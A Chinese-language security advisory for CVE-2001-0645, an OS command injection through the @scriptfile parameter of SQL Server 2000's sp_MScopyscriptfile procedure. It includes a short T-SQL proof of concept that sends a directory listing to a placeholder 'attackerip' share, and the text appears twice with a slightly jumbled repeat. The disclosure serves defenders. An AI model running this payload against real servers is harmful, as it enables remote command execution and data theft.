发布时间:2002-07-27
更新时间:2002-07-27
严重程度:高
威胁程度:远程管理员权限
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID: 5309
CVE(CAN) ID: CVE-2001-0645
受影响系统
Microsoft SQL Server 2000在复制的时候包含两个过程,攻击者可以操作输入提供恶意参数给存储过程,可导致执行任意命令。
Sp_MScopyscriptfile存储过程是复制操作的存储过程之一,存在SQL插入漏洞,Sp_MScopyscriptfile存储过程可以SQL服务器复制的目录,并拷贝脚本文件到这个目录中,其中之一的输入参数@scriptfile是要拷贝脚本文件的名称,在这个参数中可以使用OS命令进行插入,然后执行by xp_cmdshell.
要成功利用这个漏洞需要有SQL Server Agent Proxy帐户,默认没有开启。
测试代码
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:/ >
"//attackerip/share/dir.txt"'
select @scripfile='c:/autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
更新时间:2002-07-27
严重程度:高
威胁程度:远程管理员权限
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID: 5309
CVE(CAN) ID: CVE-2001-0645
受影响系统
Microsoft SQL Server 2000 SP2详细描述
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
Microsoft SQL Server 2000
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
Microsoft SQL Server 2000 Desktop Engine
+ Microsoft Visio Enterprise Network Tools
Microsoft SQL Server 2000在复制的时候包含两个过程,攻击者可以操作输入提供恶意参数给存储过程,可导致执行任意命令。
Sp_MScopyscriptfile存储过程是复制操作的存储过程之一,存在SQL插入漏洞,Sp_MScopyscriptfile存储过程可以SQL服务器复制的目录,并拷贝脚本文件到这个目录中,其中之一的输入参数@scriptfile是要拷贝脚本文件的名称,在这个参数中可以使用OS命令进行插入,然后执行by xp_cmdshell.
要成功利用这个漏洞需要有SQL Server Agent Proxy帐户,默认没有开启。
测试代码
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:/ >
"//attackerip/share/dir.txt"'
select @scripfile='c:/autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''